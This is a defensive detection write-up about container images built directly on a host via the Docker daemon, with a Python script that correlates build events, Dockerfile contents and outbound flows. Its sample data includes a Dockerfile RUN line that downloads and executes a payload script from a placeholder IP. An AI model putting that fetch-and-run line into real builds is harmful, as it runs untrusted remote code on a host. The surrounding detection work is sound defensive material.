Detection of container images being built directly on a host through the Docker daemon or Kubernetes APIs. Defenders may observe docker build invocations or POST /build API requests, anomalous Dockerfile instructions (such as a RUN step that downloads code from an unknown IP address), or new images that are created and then deployed immediately. The behavior chain consists of an unexpected image creation event correlated, within a short time window, with outbound network communication from the build host to non-standard or untrusted destinations.
| Data Component | Name | Channel |
|---|---|---|
| Image Creation (DC0015) | docker:daemon | docker build or POST /build API request |
| Network Connection Creation (DC0082) | NSM:Flow | outbound connections from host during or immediately after image build |

| Field | Description |
|---|---|
| RegistryAllowList | Defines trusted registries for image pulls/builds. Builds referencing unapproved registries may indicate adversary behavior. |
| NewImageThreshold | Threshold for number of new custom images created in a given time window. Exceeding this threshold may indicate malicious builds. |
| TimeWindow | Defines correlation window (e.g., 5m) between suspicious build activity and subsequent network traffic anomalies. |
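The correlation described above, with the three mutable elements from the table applied, as an added example that is not part of the original page or of any vendor's analytic. The build and flow events are constructed sample records with hypothetical field names (ts, host, image, dockerfile, dst_ip, dst_port); the registry allowlist, threshold, window and trusted internal ranges are assumed values. Each image is reported only when at least one indicator fires: a FROM line pulling from a registry outside the allowlist, a RUN instruction fetching from a bare IP URL, or an outbound connection to a non-allowlisted destination during or within the window after the build. A separate check flags hosts that exceed the new-image threshold inside any window.

```python
"""Correlate Docker image-build events (DC0015) with outbound flows (DC0082)
and Dockerfile content. Added example; event shapes and field names are
constructed, not any product's schema."""
import re
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Tunables mirroring the page's mutable elements (values are assumptions).
REGISTRY_ALLOWLIST = {"docker.io", "registry.internal.example"}
NEW_IMAGE_THRESHOLD = 2          # more than this many builds per host per window
TIME_WINDOW = timedelta(minutes=5)
# Destinations treated as expected (assumed internal ranges). Deliberately not
# using ip_address(...).is_private, which also covers the TEST-NET ranges.
TRUSTED_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]


def ts(s):
    return datetime.fromisoformat(s)


# Constructed sample build events, one per docker build / POST /build.
BUILD_EVENTS = [
    {"ts": ts("2024-05-01T09:50:00"), "host": "node-a", "image": "internal/app:1.0",
     "dockerfile": ["FROM registry.internal.example/base:3.19", "COPY . /app"]},
    {"ts": ts("2024-05-01T10:02:00"), "host": "node-a", "image": "worker:latest",
     "dockerfile": ["FROM docker.io/library/alpine:3.19",
                    "RUN curl -sO http://203.0.113.7/payload.sh && sh payload.sh"]},
    {"ts": ts("2024-05-01T10:03:00"), "host": "node-a", "image": "tool:latest",
     "dockerfile": ["FROM ghcr.io/someone/tool:1"]},
    {"ts": ts("2024-05-01T10:03:30"), "host": "node-a", "image": "scratchpad:latest",
     "dockerfile": ["FROM alpine", "RUN apk add --no-cache bash"]},
    {"ts": ts("2024-05-01T11:00:00"), "host": "node-b", "image": "svc:2",
     "dockerfile": ["FROM registry.internal.example/base:3.19"]},
]

# Constructed sample outbound flow records from the same hosts.
FLOW_EVENTS = [
    {"ts": ts("2024-05-01T10:02:10"), "host": "node-a", "dst_ip": "203.0.113.7", "dst_port": 80},
    {"ts": ts("2024-05-01T10:02:30"), "host": "node-a", "dst_ip": "10.1.2.3", "dst_port": 443},
    {"ts": ts("2024-05-01T10:04:00"), "host": "node-a", "dst_ip": "198.51.100.9", "dst_port": 4444},
    {"ts": ts("2024-05-01T11:30:00"), "host": "node-b", "dst_ip": "198.51.100.9", "dst_port": 443},
]

FROM_RE = re.compile(r"^\s*FROM\s+(?:--platform=\S+\s+)?(\S+)", re.IGNORECASE)
IP_URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})")


def registry_of(image_ref):
    """Registry host of an image reference, using Docker's rule: the first path
    component is a registry only if it contains '.' or ':' or is 'localhost';
    otherwise the reference resolves to docker.io."""
    first, _, rest = image_ref.partition("/")
    if rest and ("." in first or ":" in first or first == "localhost"):
        return first
    return "docker.io"


def unapproved_base_images(dockerfile):
    """FROM references whose registry is outside RegistryAllowList."""
    return [m.group(1) for line in dockerfile
            if (m := FROM_RE.match(line))
            and registry_of(m.group(1)) not in REGISTRY_ALLOWLIST]


def raw_ip_downloads(dockerfile):
    """IP addresses fetched by RUN instructions via a bare-IP URL."""
    return [ip for line in dockerfile if line.lstrip().upper().startswith("RUN ")
            for ip in IP_URL_RE.findall(line)]


def is_trusted_dst(ip):
    addr = ip_address(ip)
    return any(addr in net for net in TRUSTED_NETS)


def untrusted_flows_after(build, flows, window=TIME_WINDOW):
    """Connections from the build host to non-allowlisted destinations during
    or within `window` after the build (the TimeWindow correlation)."""
    start, end = build["ts"], build["ts"] + window
    return [(f["dst_ip"], f["dst_port"]) for f in flows
            if f["host"] == build["host"] and start <= f["ts"] <= end
            and not is_trusted_dst(f["dst_ip"])]


def hosts_over_threshold(builds, threshold=NEW_IMAGE_THRESHOLD, window=TIME_WINDOW):
    """Hosts where more than `threshold` images were built inside any window
    starting at one of their own builds (the NewImageThreshold check)."""
    flagged = set()
    for b in builds:
        n = sum(1 for o in builds if o["host"] == b["host"]
                and b["ts"] <= o["ts"] <= b["ts"] + window)
        if n > threshold:
            flagged.add(b["host"])
    return flagged


def triage(builds, flows):
    """Per-image findings; an image is reported only when an indicator fires."""
    report = {}
    for b in builds:
        finding = {
            "unapproved_registry": unapproved_base_images(b["dockerfile"]),
            "raw_ip_download": raw_ip_downloads(b["dockerfile"]),
            "untrusted_outbound": untrusted_flows_after(b, flows),
        }
        if any(finding.values()):
            report[b["image"]] = finding
    return report


if __name__ == "__main__":
    for image, finding in triage(BUILD_EVENTS, FLOW_EVENTS).items():
        print(image, finding)
    print("hosts over build threshold:", hosts_over_threshold(BUILD_EVENTS))
```

Note that scratchpad:latest is reported purely because a suspicious connection from node-a fell inside its window; that is the intended behavior of a per-host correlation and is why the window should be kept short and the result treated as a lead for triage rather than a verdict on that particular image.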